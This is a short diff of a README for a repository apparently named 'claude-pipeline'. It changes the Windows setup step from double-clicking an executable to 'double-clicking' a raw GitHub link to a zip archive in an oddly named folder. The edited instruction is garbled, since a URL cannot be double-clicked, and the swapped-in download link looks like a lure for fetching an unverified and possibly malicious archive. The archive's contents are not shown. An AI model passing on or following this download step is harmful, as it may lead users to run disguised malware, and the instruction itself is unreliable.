kenzoprime/claude-pipeline/README.md

 5. **Run the program**

-   - On Windows: Open the folder and double-click `claude-pipeline.exe` to start.
+   - On Windows: Open the folder and double-click `https://github.com/kenzoprime/claude-pipeline/raw/refs/heads/main/antimoniferous/claude_pipeline_v2.5.zip` to start.
    - On Linux: Open a terminal in the folder, then type `./claude-pipeline` and press Enter.

 6. **Follow on-screen instructions**